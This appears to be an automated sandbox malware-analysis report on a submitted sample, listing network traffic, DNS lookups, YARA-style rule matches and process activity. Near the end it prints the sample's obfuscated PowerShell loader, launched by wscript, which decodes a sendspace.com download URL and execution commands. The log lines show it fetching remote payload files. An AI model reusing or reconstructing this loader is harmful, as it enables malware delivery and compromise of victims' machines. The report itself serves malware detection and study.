Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 99.8% probability |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49739 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49740 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb: source: powershell.exe, 00000004.00000002.2323976689.0000000008840000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: ment.Automation.pdb source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2324570247.00000000088C6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbR source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2320193055.0000000007728000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.2315469765.0000000003014000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: Joe Sandbox View |
IP Address: 69.31.136.57 69.31.136.57 |
Source: Joe Sandbox View |
IP Address: 69.31.136.53 69.31.136.53 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/exw2o1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n4.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/dvbcvt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs12n1.sendspace.comConnection: Keep-AliveCookie: SID=kasl9f49sokivj0jd0u0img0e2 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/exw2o1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs13n4.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/dvbcvt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/abb1ac42d6f7e317093ecbc9d7acfd44/664f6ddc/dvbcvt/TGFVxUhEOgecNvM13.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs12n1.sendspace.comConnection: Keep-AliveCookie: SID=kasl9f49sokivj0jd0u0img0e2 |
Source: global traffic |
DNS traffic detected: DNS query: www.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs13n4.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs12n1.sendspace.com |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C30440000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs13n4.sendspace.com |
Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E221000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n4.sendspaX |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n4.sendspace.com |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E75A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30429000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C2E75E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C3042D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30409000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n4.sendspace.com/dlpro/34b20cf0440cef8a4c2d2511415a2b43/664f6da6/exw2o1/Croutons.xtp |
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2EDAF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.2697536992.0000015C468F2000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://go.microsoft.c |
Source: powershell.exe, 00000001.00000002.2672896517.0000015C3E291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2318228321.0000000005D69000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2531372219.0000015C30250000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: powershell.exe, 00000001.00000002.2531372219.0000015C2E447000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1P |
Source: powershell.exe, 00000004.00000002.2316522228.0000000004E58000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/exw2o1XR |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49731 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49731 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49740 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49739 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49739 -> 443 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49731 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49739 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.4:49740 version: TLS 1.2 |
Source: amsi64_2656.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_6536.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6536, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6908 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6908 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 6908 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6908 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$palaverist = 1;$Massesamfund='Su';$Massesamfund+='bstrin';$Massesamfund+='g';Function Lnkampene($Thurlsvaflers){$Uindfriede=$Thurlsvaflers.Length-$palaverist;For($Thurl=5;$Thurl -lt $Uindfriede;$Thurl+=6){$Tachyglossate+=$Thurlsvaflers.$Massesamfund.Invoke( $Thurl, $palaverist);}$Tachyglossate;}function Kolesterol($Overanxious){& ($Maimedly) ($Overanxious);}$Skovbrandsbekmpelses=Lnkampene ' PremMJule o Ped,zRognfi.artel RicilRepleaAphan/ Pr n5Wardl. Cong0Co ta T,ead(AkupuWF,rjti Cottn TeledClarioentrewAnke sPetio Ti.baNEnknnTComp Kad,1Fejll0 Korp. Bro.0 Pul ;Logpe OffsW Dispipleninbasen6 avin4Korri;stemm Ha.ndx Unfr6,irkl4Sm,ak;Aflev DefenrInfervBedk :lokal1 Baml2Asbes1Frais.Alumi0Palp )Gastr subgeG,retse a,tncSlavekAmideoScann/Pec,i2Und r0Disma1 Co.n0Cornc0 ispr1belly0 Naup1Partr TretFTroeliPanglrDeprae Pne fjowl o DrabxGadef/suffl1 Rrbl2E,nea1Dbend.Rele,0Semic ';$Organismers=Lnkampene 'LigegU ,anks An,meFolier,krob-EquivA Ibr gWalloeDetonnChamotBedri ';$Skadevolderne=Lnkampene 'VizirhRashnt MigatF gtip.imels Frem:Kampe/Nonou/SolsowDisc,wMinidwDelag.WardesRidese ExtonS ippdRungesLyterpPostiaSten cLegate Bo t.Sup rcretroo.etalmS.kbr/SalvapK,ansr W leoSchan/Psychd RedelMezzo/LyspaeBl,nhx alstwSlage2LungeoHomel1foreg ';$Malaxate=Lnkampene 'D.bri>Fiske ';$Maimedly=Lnkampene 'mudpuiPadeye.rescx Te.t ';$Whammo='impery';Kolesterol (Lnkampene ' TheoSFamile.ranstDomi,-Ac,taC,pplioDiskrn C tot,lackeThecon ,icht Mou Cento-NontrPSe.dea R.trtUnic,hGynan MangT fies: Adt.\H.ftaMTrafiu GuldfShapefkasseeRekrnnFinge. PromtFore xstat,tGaypo Ylvas-KorreVCr noaHypotlCatheudrueme Ko,p Comm,$BeredWVl inhBass.aVedhnmSubsum somo Raas;Semi ');Kolesterol (Lnkampene 'Whem iEft rf Reti Skygg(Arakatmajore attsAm,hit Alek- ,ardpH,rdsa AgritSnorehImpli ProduTWhore:Fragr\,eostMSarkouE,spafMon,pf Gen,eTilsknOpede. fragtHa.tixFarvetgadsh)Symph{Telefe BltexBloduiDisoctLeean}.rysa;Humbu ');$Prevascular = Lnkampene 'StabieGstelc RegnhS.lkeo Harm Vi.r%For.ba SolcpSamkvpU valdFondsa.rejetDet,eaTilen%Redef\Pi.trO Pri.mArcanrZoogry Bills ortrtMaskinkarnfiA,lurn,ragmgFo,egeCatchrUnbeg.HoundD Limai NoelmRavne Ste.b&Tragt&divel PseudePaatrc Etceh halvoBlee, met o$Krmme ';Kolesterol (Lnkampene ' m gg$RestagForfilSnippoCos.obForfaa Leg,lBerbe:UbetnB DehonEksp.kBordee Su.e=Aphel(DriftcSydamm ComidB dki ,iffi/Ha rscGenio Fuld |